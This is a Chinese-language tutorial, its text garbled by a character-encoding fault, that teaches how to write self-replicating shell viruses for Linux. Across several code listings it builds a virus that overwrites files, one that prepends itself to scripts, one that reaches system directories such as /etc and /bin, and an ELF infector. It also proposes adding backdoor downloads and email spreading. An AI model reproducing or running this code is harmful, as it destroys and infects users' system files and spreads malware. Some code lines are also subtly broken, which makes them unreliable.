如何用Shell病毒技術(shù)感染Linux腳本程序
-------------------
當(dāng)然,本文需要你至少了解linux shell編程的基礎(chǔ)知識(shí)和一星點(diǎn)的病毒知識(shí).
ok!我們進(jìn)入正題!
我們來(lái)看一個(gè)最原始的shell病毒,代碼最能說(shuō)明問(wèn)題:
---------------------------------------------------------
#shellvirus I
for file in *
do
cp $0 $file
done
---------------------------------------------------------
簡(jiǎn)單吧?遍歷當(dāng)前文件系統(tǒng)的所有文件,然后覆蓋所有文件.但是,我們知道linux是多用戶的操作系統(tǒng),它的文件是具有
保護(hù)模式的,所以以上的腳本有可能會(huì)報(bào)出一大堆的錯(cuò)誤,所以它很快就會(huì)被管理員發(fā)現(xiàn)并制止它的傳染.所以我們可以
為該腳本做個(gè)判斷,這樣隱蔽性就大大增強(qiáng)了:
---------------------------------------------------------
#shellvirus II
for file in *
do
if test -f $file
then
if test -x $file
then
if test -w $file
then
if grep -s echo $file >.mmm
then
cp $0 $file
fi; fi; fi; fi; fi
done
rm .mmm -f
---------------------------------------------------------
ok.我們改進(jìn)了一下,加了若干的判斷,判斷文件是否存在,是否文件可執(zhí)行,是否我們有權(quán)限寫(xiě),再判斷它是否是腳本程序
如果是就cp $0 $file,所以這段代碼是感然該系統(tǒng)所有的腳本程序的,危害性還是比較大的.if grep -s echo $file>/.mmm
這句也可以這樣寫(xiě):if file $file | grep -s 'Bourne shell script' > /dev/nul ; then,也就是判斷file是否為shell
腳本程序.
但是,腳本病毒一旦在感染完畢之后就什么也不做了,它沒(méi)有象二進(jìn)制病毒那樣的潛伏的危害性,而且以上的腳本只是簡(jiǎn)
單的覆蓋宿主而已,所以我這里利用了一下傳統(tǒng)的二進(jìn)制病毒的感染機(jī)制,效果也不錯(cuò),看看下面代碼:
---------------------------------------------------------
#infection
head -n 24 $0 > .test -取自身保存到.test
for file in * -遍歷文件系統(tǒng)
do
if test -f $file -判斷是否為文件
then
if test -x $file -判斷文件是否可執(zhí)行
then
if test -w $file -判斷文件是否可寫(xiě)
then
if grep -s echo $file >.mmm -判斷是否為腳本程序
then
head -n 1 $file >.mm -提取要感染的腳本程序的第一行
if grep -s infection .mm >.mmm -判斷該文件是否已經(jīng)被感染
then
rm -f .mm -已經(jīng)被感染,則跳過(guò)
else -還未被感染
cat $file > .SAVEE -很熟悉吧?借用了傳統(tǒng)的二進(jìn)制文件的感染機(jī)制
cat .test > $file
cat .SAVEE >> $file
fi; fi; fi; fi; fi
done
rm .test .SAVEE .mmm .mm -f
--------------------------------------------------------
程序的注解足以說(shuō)明了,其實(shí)增加了潛伏的危害性,但還是特容易被發(fā)現(xiàn),沒(méi)辦法的事情,shell腳本一般都是明文的,呵呵.不過(guò)
危害性已經(jīng)相當(dāng)大了.這段程序用了一個(gè)感染標(biāo)志:infection來(lái)判斷是否已經(jīng)被感染,著在程序中可以反應(yīng)出來(lái).
ok,為了使上面的代碼不容易被發(fā)現(xiàn),我必須優(yōu)化它,最先考慮的肯定是精練代碼:
--------------------------------------------------------
#infection
for file in * ; do
if test -f $file test -x $file test -w $file ; then
if grep -s echo $file > /dev/nul ; then
head -n 1 $file >.mm
if grep -s infection .mm > /dev/nul ; then
rm .mm -f ; else
cat $file > .SAVEE
head -n 13 $0 > $file
cat .SAVEE >> $file
fi; fi; fi
done
rm .SAVEE .mm -f
--------------------------------------------------------
現(xiàn)在只有兩個(gè)臨時(shí)文件的產(chǎn)生了,代碼也被精簡(jiǎn)到了13行.當(dāng)然可以完全用;來(lái)把代碼甚至寫(xiě)到1-2行,但這里我只是說(shuō)明問(wèn)題,就
不寫(xiě)出來(lái)了.
好,我們看看,shell病毒還能做哪些有用的事情,有可能我們想感染別的目錄的文件,比如根目錄或者是/etc,/bin等等,因?yàn)榇蠖?
數(shù)有用的系統(tǒng)配置腳本都存放在那些目錄下,只要對(duì)上述代碼稍作改動(dòng)就可以實(shí)現(xiàn)了
--------------------------------------------------------
#infection
xtemp=$pwd -保存當(dāng)前路徑
head -n 22 $0 > /.test
for dir in /* ; do -遍歷/目錄
if test -d $dir ; then -如果是目錄就cd該目錄
cd $dir
for file in * ; do -遍歷該目錄文件
if test -f $file test -x $file test -w $file ; then -確定文件是否可執(zhí)行,可寫(xiě)
if grep -s echo $file > /dev/nul ; then -確定是否為腳本程序
head -n 1 $file > .mm
if grep -s infection .mm > /dev/nul ; then -確定是否已經(jīng)被感染
rm .mm -f ; else
cat $file > /.SAVEE -和前面的感染機(jī)制一樣感染未被感染的腳本程序
cat /.test > $file
cat /.SAVEE >> $file
fi; fi; fi
done
cd ..
fi
done
cd $xtemp -返回原目錄
rm /.test /.SAVEE .mm -f
-------------------------------------------------------------
其實(shí)這段代碼只感染了/目錄下的一層目錄.當(dāng)然我們可以使它感染的更深,只是加幾個(gè)循環(huán)而已.同樣shell病毒可以做很多事情
如download后門(mén)程序,為機(jī)器自動(dòng)開(kāi)后門(mén),主動(dòng)去攻擊聯(lián)網(wǎng)的其他機(jī)器,取用戶的email來(lái)發(fā)送傳染等等.總之它的實(shí)現(xiàn)技術(shù)不高深,
但也比較實(shí)用,還是值得去說(shuō)明一下的,呵呵.
同樣,我們也可以感染elf文件,但危害性很小,這里不重點(diǎn)講,給個(gè)例程大家理解一下吧
-------------------------------------------------------------
for file in * ; do
if test -f $file test -x $file test -w $file ; then
if file $file | grep -s 'ELF' > /dev/nul ; then
mv $file .$file
head -n 9 $0 > $file
fi; fi
done
.$0
評(píng)論